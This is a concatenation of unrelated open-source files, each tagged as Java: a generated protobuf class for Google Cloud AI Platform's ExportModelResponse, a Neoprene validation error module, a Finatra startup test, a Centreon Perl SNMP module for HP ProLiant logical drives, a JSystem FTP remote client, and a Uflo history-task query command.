done = true; } break; } } } } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(this); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); } finally { this.unknownFields = unknownFields.build(); makeExtensionsImmutable(); } } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ExportModelResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ExportModelResponse.class, com.google.cloud.aiplatform.v1.ExportModelResponse.Builder.class); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { unknownFields.writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; size += unknownFields.getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.aiplatform.v1.ExportModelResponse)) { return super.equals(obj); } com.google.cloud.aiplatform.v1.ExportModelResponse other = (com.google.cloud.aiplatform.v1.ExportModelResponse) obj; if (!unknownFields.equals(other.unknownFields)) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (29 * hash) + unknownFields.hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.aiplatform.v1.ExportModelResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message of [ModelService.ExportModel][google.cloud.aiplatform.v1.ModelService.ExportModel] operation. * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ExportModelResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1.ExportModelResponse) com.google.cloud.aiplatform.v1.ExportModelResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ExportModelResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ExportModelResponse.class, com.google.cloud.aiplatform.v1.ExportModelResponse.Builder.class); } // Construct using com.google.cloud.aiplatform.v1.ExportModelResponse.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} } @java.lang.Override public Builder clear() { super.clear(); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor; } @java.lang.Override public com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstanceForType() { return com.google.cloud.aiplatform.v1.ExportModelResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloud.aiplatform.v1.ExportModelResponse build() { com.google.cloud.aiplatform.v1.ExportModelResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.aiplatform.v1.ExportModelResponse buildPartial() { com.google.cloud.aiplatform.v1.ExportModelResponse result = new com.google.cloud.aiplatform.v1.ExportModelResponse(this); onBuilt(); return result; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.aiplatform.v1.ExportModelResponse) { return mergeFrom((com.google.cloud.aiplatform.v1.ExportModelResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.aiplatform.v1.ExportModelResponse other) { if (other == com.google.cloud.aiplatform.v1.ExportModelResponse.getDefaultInstance()) return this; this.mergeUnknownFields(other.unknownFields); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { com.google.cloud.aiplatform.v1.ExportModelResponse parsedMessage = null; try { parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { parsedMessage = (com.google.cloud.aiplatform.v1.ExportModelResponse) e.getUnfinishedMessage(); throw e.unwrapIOException(); } finally { if (parsedMessage != null) { mergeFrom(parsedMessage); } } return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1.ExportModelResponse) } // @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1.ExportModelResponse) private static final com.google.cloud.aiplatform.v1.ExportModelResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1.ExportModelResponse(); } public static com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ExportModelResponse> PARSER = new com.google.protobuf.AbstractParser<ExportModelResponse>() { @java.lang.Override public ExportModelResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return new ExportModelResponse(input, extensionRegistry); } }; public static com.google.protobuf.Parser<ExportModelResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ExportModelResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
Java
/*! * Module requirements */ var NeopreneError = require('../error') /** * Document Validation Error * * @api private * @param {Document} instance * @inherits NeopreneError */ function ValidationError (instance) { NeopreneError.call(this, "Validation failed"); Error.captureStackTrace(this, arguments.callee); this.name = 'ValidationError'; this.errors = instance.errors = {}; }; /** * Console.log helper * @api private */ ValidationError.prototype.toString = function () { return this.name + ': ' + Object.keys(this.errors).map(function (key) { return String(this.errors[key]); }, this).join(', '); }; /*! * Inherits from NeopreneError. */ ValidationError.prototype.__proto__ = NeopreneError.prototype; /*! * Module exports */ module.exports = exports = ValidationError;
Java
package com.twitter.tiny import com.google.inject.Stage import com.twitter.finatra.http.test.EmbeddedHttpServer import com.twitter.inject.server.FeatureTest class TinyUrlServerStartupTest extends FeatureTest { override val server = new EmbeddedHttpServer( stage = Stage.PRODUCTION, twitterServer = new TinyUrlServer) "Server" should { "startup" in { server.assertAppStarted() } } }
Java
# # Copyright 2019 Centreon (http://www.centreon.com/) # # Centreon is a full-fledged industry-strength solution that meets # the needs in IT infrastructure and application monitoring for # service performance. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # package hardware::server::hp::proliant::snmp::mode::components::daldrive; use strict; use warnings; my %map_daldrive_condition = ( 1 => 'other', 2 => 'ok', 3 => 'degraded', 4 => 'failed', ); my %map_ldrive_status = ( 1 => 'other', 2 => 'ok', 3 => 'failed', 4 => 'unconfigured', 5 => 'recovering', 6 => 'readyForRebuild', 7 => 'rebuilding', 8 => 'wrongDrive', 9 => 'badConnect', 10 => 'overheating', 11 => 'shutdown', 12 => 'expanding', 13 => 'notAvailable', 14 => 'queuedForExpansion', 15 => 'multipathAccessDegraded', 16 => 'erasing', ); my %map_faulttol = ( 1 => 'other', 2 => 'none', 3 => 'mirroring', 4 => 'dataGuard', 5 => 'distribDataGuard', 7 => 'advancedDataGuard', 8 => 'raid50', 9 => 'raid60', ); # In 'CPQIDA-MIB.mib' my $mapping = { cpqDaLogDrvFaultTol => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.3', map => \%map_faulttol }, cpqDaLogDrvStatus => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.4', map => \%map_ldrive_status }, }; my $mapping2 = { cpqDaLogDrvCondition => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.11', map => \%map_daldrive_condition }, }; my $oid_cpqDaLogDrvEntry = '.1.3.6.1.4.1.232.3.2.3.1.1'; my $oid_cpqDaLogDrvCondition = '.1.3.6.1.4.1.232.3.2.3.1.1.11'; sub load { my ($self) = @_; push @{$self->{request}}, { oid => $oid_cpqDaLogDrvEntry, start => $mapping->{cpqDaLogDrvFaultTol}->{oid}, end => $mapping->{cpqDaLogDrvStatus}->{oid} }, { oid => $oid_cpqDaLogDrvCondition }; } sub check { my ($self) = @_; $self->{output}->output_add(long_msg => "Checking da logical drives"); $self->{components}->{daldrive} = {name => 'da logical drives', total => 0, skip => 0}; return if ($self->check_filter(section => 'daldrive')); foreach my $oid ($self->{snmp}->oid_lex_sort(keys %{$self->{results}->{$oid_cpqDaLogDrvCondition}})) { next if ($oid !~ /^$mapping2->{cpqDaLogDrvCondition}->{oid}\.(.*)$/); my $instance = $1; my $result = $self->{snmp}->map_instance(mapping => $mapping, results => $self->{results}->{$oid_cpqDaLogDrvEntry}, instance => $instance); my $result2 = $self->{snmp}->map_instance(mapping => $mapping2, results => $self->{results}->{$oid_cpqDaLogDrvCondition}, instance => $instance); next if ($self->check_filter(section => 'daldrive', instance => $instance)); $self->{components}->{daldrive}->{total}++; $self->{output}->output_add(long_msg => sprintf("da logical drive '%s' [fault tolerance: %s, condition: %s] status is %s.", $instance, $result->{cpqDaLogDrvFaultTol}, $result2->{cpqDaLogDrvCondition}, $result->{cpqDaLogDrvStatus})); my $exit = $self->get_severity(section => 'daldrive', value => $result->{cpqDaLogDrvStatus}); if (!$self->{output}->is_status(value => $exit, compare => 'ok', litteral => 1)) { $self->{output}->output_add(severity => $exit, short_msg => sprintf("da logical drive '%s' is %s", $instance, $result->{cpqDaLogDrvStatus})); } } } 1;
Java
/* * Copyright 2005-2010 Ignis Software Tools Ltd. All rights reserved. */ package com.aqua.filetransfer.ftp; import java.io.File; import java.io.FileInputStream; import java.util.Properties; import jsystem.framework.JSystemProperties; import jsystem.framework.system.SystemObjectImpl; import jsystem.utils.FileUtils; import jsystem.utils.ReflectionUtils; import jsystem.utils.StringUtils; import systemobject.terminal.Cli; import systemobject.terminal.Prompt; import com.aqua.sysobj.conn.CliConnection; import com.aqua.sysobj.conn.CliConnectionImpl; import com.aqua.sysobj.conn.CliFactory; /** * <b>SystemObject for running FTP client on a remote machine.</b><br> * The main purpose of this system object is to enable file transfer * without assuming an FTP server is running on the remote machine.<br> * In a typical usage of this SystemObject, an embedded FTP server * will be activated on the local machine. * A {@link Cli} session is opened with the remote client the session * activates the FTP client on the remote machine. <br> * * <u>Using FTPRemoteClient</u><br> * SystemObject can be instantiated from sut file or directly in the code. * Once initiated copy operations can be used. * The copy operations identifies whether a connection is already open if not * a connection is opened.<br> * In many cases the remote server (telnet/ssh) limits number of connections; * use the {@link #closeFTPSession()} to close connection when needed.<br> * * Passivation: since TAS 4.9 the sys object support passivation. Please note that passivation * is only supported when the remote client is a linux machine. * In case the built-in prompts are not enough to open an FTP session * with the FTP server you are using the system object also supports adding additional FTP prompts. * To do that write a property file called {@link #FILE_TRANSFER_PROPERTIES_FILE_NAME} * (in run directory) and add to it the following properties: * {@link #FTP_LOGIN_PROMPTS} - comma seperated prompts which identifies that * the FTP server waits for the user to enter the login user name * * {@link #FTP_PASSWORD_PROMPTS} - comma seperated prompts which identifies that * the FTP server waits for the user to enter the password * * {@link #FTP_PROMPTS} - comma seperated prompts which identifies that * the FTP server is waiting for an ftp command * * Since TAS 4.9 cli connectivity parameters to can be set using CliConnection. * This can be done either by passing a CliConnection to the FtpRemoteClient constructor * or setting the <code>cliConnection</code> member through the SUT file. * When connectivity parameters are set using a CliConnection other connectivity * parameters are ignored (host,operatingSystem,protocol,port,user,password). * * FTP Server address: * ------------------- * FTP Server address is fetched as following: * If the user gave value to the member {@link #ftpServerHostName} through the SUT file * or by activating it's setter this will be the server to which the remote ftp client will * try to connect. * Next, when connecting, the system object will try to fetch the property {@value #LOCAL_HOST_ADDRESS_PROPERTY} * from the jsystem.properties file, if the property was set it will use it as server address * otherwise, the system object uses java API to get local machine host name and uses it as server address. */ public class FTPRemoteClient extends SystemObjectImpl { public static final String FILE_TRANSFER_PROPERTIES_FILE_NAME = "filetransfer.properties"; public static final String FTP_PROMPTS = "ftp.prompts"; public static final String FTP_LOGIN_PROMPTS = "ftp.login.prompts"; public static final String FTP_PASSWORD_PROMPTS = "ftp.password.prompts"; public static final String LOCAL_HOST_ADDRESS_PROPERTY = "local.host.external.name"; public CliConnection cliConnection; private Cli cli; private String host; private String operatingSystem = CliFactory.OPERATING_SYSTEM_WINDOWS; private String protocol = "telnet"; private int port = 23; private String user; private String password; private String ftpServerHostName; private String ftpUserName="aqua"; private String ftpPassword="aqua"; private boolean ascii ; private Prompt[] ftpGeneralPrompts; private Prompt[] ftpLoginPrompts; private Prompt[] ftpPasswordPrompts; private java.net.InetAddress localMachine; private boolean promptOn = true; /** */ public FTPRemoteClient(CliConnection cliConn,String ftpServerHostName) throws Exception{ cliConnection = cliConn; setFtpServerHostName(ftpServerHostName); } /** * Constructs a FTPRemoteClient for working on local machine as the remote machine.<br> * Used for testing purposes. */ public FTPRemoteClient() throws Exception{ localMachine = java.net.InetAddress.getLocalHost(); setHost(localMachine.getHostName()); } /** * Constructs a FTPRemoteClient were remote machine is this machine. * The FTPRemoteClient assumes Aqua's embedded FTP server is running on * this machine. */ public FTPRemoteClient(String user,String password) throws Exception { this(); setUser(user); setPassword(password); } /** * Constructs a FTPRemoteClient were remote machine is <code>host</code>. * The FTPRemoteClient assumes Aqua's embedded FTP server is running on * this machine. */ public FTPRemoteClient(String host,String telnetUser,String telnetPassword,String ftpServerHostName) throws Exception{ this(telnetUser,telnetPassword); setHost(host); setFtpServerHostName(ftpServerHostName); } /** * Initializes {@link FTPRemoteClient} members and verifies that * a telnet connection can be opened to the remote client and * that the remote client can open a FTP connection to the server.<br> * All connections are closed when initialization is done. * @see SystemObjectImpl#init() */ public void init() throws Exception { super.init(); initPrompts(); } /** * Closes connection to remote machine. */ public void closeFTPSession(){ closeFtp(); closeCli(); } /** * Copies a file from FTP server machine(in most cases it will be the local machine) * to the remote client.<br> * Source file path should be relative to FTP user home directory and not absolute * file path. * Destination can be either absolute destination path or relative to client's * user directory.<br> */ public void copyFileFromLocalMachineToRemoteClient(String source, String destination) throws Exception { StringBuffer stringbuffer = new StringBuffer("get "); destination = adjustPath(destination); stringbuffer.append(source); stringbuffer.append(" "); stringbuffer.append(destination); copyFileViaFTP(stringbuffer.toString()); } /** * Copies all files from FTP server machine(in most cases it will be the local machine) * to the remote client.<br> * * @param filesPath - String Array (String...) of full file path.<br> * @throws Exception */ public void copyAllFilesFromLocalMachineToLocalRemote(String... filesPath) throws Exception{ copyAllFilesViaFTP("mget ", filesPath); } /** * Copies a file from the remote client to FTP server machine(in most cases it will be * the local machine) * * Source file path can be either absolute destination path or relative to client's * user directory. * Destination should be relative to FTP user home directory and not absolute * file path. */ public void copyFileFromRemoteClientToLocalMachine(String source, String destination) throws Exception { source = adjustPath(source); StringBuffer stringbuffer = new StringBuffer("put "); stringbuffer.append(source); stringbuffer.append(" "); stringbuffer.append(destination); copyFileViaFTP(stringbuffer.toString()); } /** * Copies all files from remote client to FTP server machine(in most cases it will be * the local machine).<br> * * @param filesPath - String Array (String...) of full file path.<br> * @throws Exception */ public void copyAllFilesFromRemoteMachineToLocalMachine(String... filesPath) throws Exception{ copyAllFilesViaFTP("mput ", filesPath); } private void copyFileViaFTP(String command) throws Exception { openFTPSession(); setAsciiMode(isAscii()); setPromptMode(isPromptOn()); runCliCommand(command); } private void copyAllFilesViaFTP(String command, String... filesPath) throws Exception { StringBuffer stringBuffer = new StringBuffer(command); openFTPSession(); setAsciiMode(isAscii()); setPromptMode(isPromptOn()); for(String currentFilePath : filesPath){ String source = adjustPath(currentFilePath); stringBuffer.append(source); stringBuffer.append(" "); } runCliCommand(stringBuffer.toString()); } private void runCliCommand(String command) throws Exception{ cli.command(command , 1000 *60 * 5,true,false,null,ftpGeneralPrompts); if (cli.getResult().indexOf("226") < 0){ throw new Exception("Failed in files transfer"); } } /** * Changes ftp session mode to passive */ public void passivate(boolean isPassive) throws Exception { openFTPSession(); for (int i = 0; i < 2;i++){ cli.command("passive",1000*60,true,false,null,ftpGeneralPrompts); String result = cli.getResult().toLowerCase(); boolean on = result.indexOf("on") >= 0; boolean off = result.indexOf("off")>= 0; boolean notSupported = result.indexOf("invalid")>= 0; if (notSupported){ throw new Exception("Passivation not supported"); } if ((isPassive && on) ||(!isPassive && off) ){ break; } } } /** * Terminates FTPRemoteClient. */ public void close() { closeFTPSession(); super.close(); } /** * Opens FTP session */ private void openFTPSession() throws Exception { initCli(); ftpLogin(); } /** */ private void initCli() throws Exception { if (cli == null){ if (cliConnection != null){ initCliFromCliConnectionImpl(); return; } Prompt p = new Prompt(); p.setPrompt(">"); p.setCommandEnd(true); cli = CliFactory.createCli(getHost(),getOperatingSystem(), getProtocol(),getUser(),getPassword(),new Prompt[]{p}); } } private void initCliFromCliConnectionImpl() throws Exception{ if (!cliConnection.isConnected()){ cliConnection.connect(); } cli = (Cli)ReflectionUtils.getField("cli", CliConnectionImpl.class).get(cliConnection); } /** */ private void closeFtp(){ try { cli.command("bye", 1000 *2 ,true,false,null,new Prompt[]{new Prompt("bye.",true)}); if (cli.getResult().indexOf("221") < 0){ report.report("Did not find success code 221"); } }catch (Exception e){ report.report("Could not find prompt after closing session. " + e.getMessage()); } } /** */ private void closeCli(){ if (cli != null){ try { if (cliConnection != null){ closeCliConnectionImpl(); } cli.close(); }catch (Exception e){ report.report("Failed closing telnet connection",e); } } cli=null; } private void closeCliConnectionImpl() throws Exception{ if (cliConnection.isConnected()){ cliConnection.disconnect(); } } /** * Starts FTP client and performs login. */ private void ftpLogin() throws Exception{ cli.command(""); String result = cli.getResult(); for (String ftpPrompt:promptsToStringArray(ftpGeneralPrompts)){ if (result.indexOf(ftpPrompt) >=0 ){ //we are already logged in return; } } String serverAddress = getFTPServerAddress(); cli.command("ftp " + serverAddress, 1000*60,true,false,null,ftpLoginPrompts); if (cli.getResult().indexOf("220") < 0){ throw new Exception("Failed connecting to FTP server.("+serverAddress+"). Please verify that there is a ping between the remote client to the runner machine"); } cli.command(getFtpUserName(),1000*60,true,false,null,ftpPasswordPrompts); if (cli.getResult().indexOf("331") < 0){ throw new Exception("Failed in login process"); } cli.command(getFtpPassword(),1000*60,true,false,null,ftpGeneralPrompts); if (cli.getResult().indexOf("230") < 0){ throw new Exception("User not authorized to login"); } } /** * Changes ftp session mode (ascii/binary) */ private void setAsciiMode(boolean isAscii) throws Exception { String command = "binary"; if (isAscii){ command="ascii"; } cli.command(command,1000*60,true,false,null,ftpGeneralPrompts); if (cli.getResult().indexOf("200") < 0){ throw new Exception("Failed changing to binary mode"); } } /** * Changes the FTP session mode ( on / off ) * @param promptOn * @throws Exception */ private void setPromptMode(boolean promptOn) throws Exception{ String command = "prompt off"; if (promptOn){ command="prompt on"; } cli.command(command,1000*60,true,false,null,ftpGeneralPrompts); if (cli.getResult().indexOf("Interactive") < 0){ throw new Exception("Failed changing prompt mode"); } } public boolean isPromptOn() { return promptOn; } public void setPromptOn(boolean promptOn) { this.promptOn = promptOn; } /** * Adjusts file path to operating system. */ private String adjustPath(String path) { if (CliFactory.OPERATING_SYSTEM_WINDOWS.equals(getOperatingSystem())){ String toReturn = FileUtils.convertToWindowsPath(path); if (!toReturn.startsWith("\"")){ toReturn = "\""+toReturn+"\""; } return toReturn; }else { return FileUtils.replaceSeparator(path); } } /** * */ private void initPrompts() throws Exception { String[] defaultFTPPrompts = new String[]{"ftp>"}; String[] defaultLoginPrompts = new String[]{"):"}; String[] defaultPasswordPrompts = new String[]{"for "+getFtpUserName(),"Password:"}; if (!new File(FILE_TRANSFER_PROPERTIES_FILE_NAME).exists()){ ftpGeneralPrompts = stringArrayToPrompts(defaultFTPPrompts); ftpLoginPrompts = stringArrayToPrompts(defaultLoginPrompts); ftpPasswordPrompts = stringArrayToPrompts(defaultPasswordPrompts); return; } Properties props = new Properties(); FileInputStream stream = new FileInputStream(FILE_TRANSFER_PROPERTIES_FILE_NAME); try { props.load(stream); }finally{ try{stream.close();}catch(Exception e){}; } String ftpPrompts = props.getProperty(FTP_PROMPTS); String[] ftpPromptsAsStringArray = StringUtils.split(ftpPrompts, ";, "); ftpPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpPromptsAsStringArray,defaultFTPPrompts}); ftpGeneralPrompts = stringArrayToPrompts(ftpPromptsAsStringArray); String _ftpLoginPrompts = props.getProperty(FTP_LOGIN_PROMPTS); String[] ftpLoginPromptsAsStringArray = StringUtils.split(_ftpLoginPrompts, ";, "); ftpLoginPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpLoginPromptsAsStringArray,defaultLoginPrompts}); ftpLoginPrompts = stringArrayToPrompts(ftpLoginPromptsAsStringArray); String _ftpPasswordPrompts = props.getProperty(FTP_PASSWORD_PROMPTS); String[] ftpPasswordPromptsAsStringArray = StringUtils.split(_ftpPasswordPrompts, ";, "); ftpPasswordPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpPasswordPromptsAsStringArray,defaultPasswordPrompts}); ftpPasswordPrompts = stringArrayToPrompts(ftpPasswordPromptsAsStringArray); } private String[] promptsToStringArray(Prompt[] prompts){ if (prompts == null){ return new String[0]; } String[] res = new String[prompts.length]; int i=0; for (Prompt p:prompts){ res[i]=p.getPrompt(); i++; } return res; } private Prompt[] stringArrayToPrompts(String[] promptsAsString){ if (promptsAsString == null){ return new Prompt[0]; } Prompt[] res = new Prompt[promptsAsString.length]; int i=0; for (String s:promptsAsString){ res[i]=new Prompt(s,false); res[i].setCommandEnd(true); i++; } return res; } private String getFTPServerAddress(){ if (!StringUtils.isEmpty(getFtpServerHostName())){ return getFtpServerHostName(); } if (!StringUtils.isEmpty(JSystemProperties.getInstance().getPreference(LOCAL_HOST_ADDRESS_PROPERTY))){ return JSystemProperties.getInstance().getPreference(LOCAL_HOST_ADDRESS_PROPERTY); } return localMachine.getHostName(); } /********************************************************************** * FTPRemoteClient setters and getters *********************************************************************/ public String getHost() { return host; } public String getOperatingSystem() { return operatingSystem; } public void setOperatingSystem(String operatingSystem) { this.operatingSystem = operatingSystem; } public String getProtocol() { return protocol; } public void setProtocol(String protocol) { this.protocol = protocol; } public void setHost(String remoteHost) { this.host = remoteHost; } public String getPassword() { return password; } public void setPassword(String telnetPassword) { this.password = telnetPassword; } public int getPort() { return port; } public void setPort(int telnetPort) { this.port = telnetPort; } public String getUser() { return user; } public void setUser(String telnetUser) { this.user = telnetUser; } public String getFtpServerHostName() { return ftpServerHostName; } public void setFtpServerHostName(String ftpServerHostName) { this.ftpServerHostName = ftpServerHostName; } public String getFtpUserName() { return ftpUserName; } public void setFtpUserName(String ftpUserName) { this.ftpUserName = ftpUserName; } public String getFtpPassword() { return ftpPassword; } public void setFtpPassword(String ftpPassword) { this.ftpPassword = ftpPassword; } public boolean isAscii() { return ascii; } public void setAscii(boolean ascii) { this.ascii = ascii; } }
Java
/******************************************************************************* * Copyright 2017 Bstek * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy * of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. ******************************************************************************/ package com.bstek.uflo.command.impl; import java.util.List; import org.hibernate.criterion.Order; import org.hibernate.criterion.Restrictions; import com.bstek.uflo.command.Command; import com.bstek.uflo.env.Context; import com.bstek.uflo.model.HistoryTask; /** * @author Jacky.gao * @since 2013年9月12日 */ public class GetListHistoryTasksCommand implements Command<List<HistoryTask>> { private long processInstanceId; public GetListHistoryTasksCommand(long processInstanceId) { this.processInstanceId = processInstanceId; } @SuppressWarnings("unchecked") public List<HistoryTask> execute(Context context) { return context.getSession().createCriteria(HistoryTask.class) .add(Restrictions.eq("processInstanceId", processInstanceId)) .addOrder(Order.desc("endDate")).list(); } }
Java
